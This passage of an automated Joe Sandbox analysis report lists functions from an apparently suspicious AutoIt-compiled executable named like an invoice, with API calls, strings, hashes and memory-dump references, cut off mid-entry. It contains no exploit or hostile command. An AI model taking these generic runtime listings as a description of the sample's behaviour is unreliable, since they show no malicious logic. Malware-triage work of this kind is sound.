                                          • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                          • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                                          • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • _wprintf.LIBCMT ref: 0045F7FC
                                          • __swprintf.LIBCMT ref: 0045F81E
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                                          • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                                          • Opcode Fuzzy Hash: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                                          • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                                          APIs
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                            • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                          • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                          • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                          • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                          • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                          • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                          • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                          APIs
                                          • timeGetTime.WINMM ref: 00464F7A
                                            • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                          • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                          • SetActiveWindow.USER32 ref: 0046500B
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                          • Sleep.KERNEL32(000000FA), ref: 00465043
                                          • IsWindow.USER32 ref: 0046504F
                                          • EndDialog.USER32(00000000), ref: 00465060
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                          • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                          • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                          • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                          • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                          • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                          • _memset.LIBCMT ref: 0046D7E1
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                          • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                          • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                          • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                          • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                          • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                          • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                          • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                          • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                          • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                          • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                          APIs
                                            • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                          • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                          • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                          • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                          • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                          APIs
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          • GetSysColor.USER32(0000000F), ref: 004021D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                          • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                          • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                          • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                          • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                          • _wcscpy.LIBCMT ref: 0046A9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                          • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                          • Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                          • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 74ab7d9cbc612685900ff787a069c33943a43cf95dcfe0a9aabba57fa72e4a3b
                                          • Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
                                          • Opcode Fuzzy Hash: 74ab7d9cbc612685900ff787a069c33943a43cf95dcfe0a9aabba57fa72e4a3b
                                          • Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19
                                          APIs
                                          • _memset.LIBCMT ref: 0048716A
                                          • CreateMenu.USER32 ref: 00487185
                                          • SetMenu.USER32(?,00000000), ref: 00487194
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                          • IsMenu.USER32(?), ref: 00487237
                                          • CreatePopupMenu.USER32 ref: 00487241
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                          • DrawMenuBar.USER32 ref: 00487276
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                          • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                          • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                          • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                          • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                          • DeleteDC.GDI32(00000000), ref: 00487594
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                          • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                          • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                          • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                          APIs
                                          • _memset.LIBCMT ref: 00426E3E
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • __gmtime64_s.LIBCMT ref: 00426ED7
                                          • __gmtime64_s.LIBCMT ref: 00426F0D
                                          • __gmtime64_s.LIBCMT ref: 00426F2A
                                          • __allrem.LIBCMT ref: 00426F80
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                          • __allrem.LIBCMT ref: 00426FB3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                          • __allrem.LIBCMT ref: 00426FE8
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                          • __invoke_watson.LIBCMT ref: 00427077
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                          APIs
                                          • _memset.LIBCMT ref: 00462542
                                          • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                          • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                          • Sleep.KERNEL32(000001F4), ref: 004625EB
                                          • GetMenuItemCount.USER32(?), ref: 0046262F
                                          • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                          • GetMenuItemID.USER32(?,?), ref: 004626BA
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                          • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                          • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                          • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                          • _memset.LIBCMT ref: 00486FDD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                          • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                          • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                          • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                          • VariantInit.OLEAUT32(?), ref: 00456C2A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                          • VariantClear.OLEAUT32(?), ref: 00456CC6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                          • VariantClear.OLEAUT32(?), ref: 00456CEE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                          • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                          • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                          • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CoInitialize.OLE32 ref: 00478403
                                          • CoUninitialize.OLE32 ref: 0047840E
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                          • IIDFromString.OLE32(?,?), ref: 004784E1
                                          • VariantInit.OLEAUT32(?), ref: 0047857B
                                          • VariantClear.OLEAUT32(?), ref: 004785DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                          • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
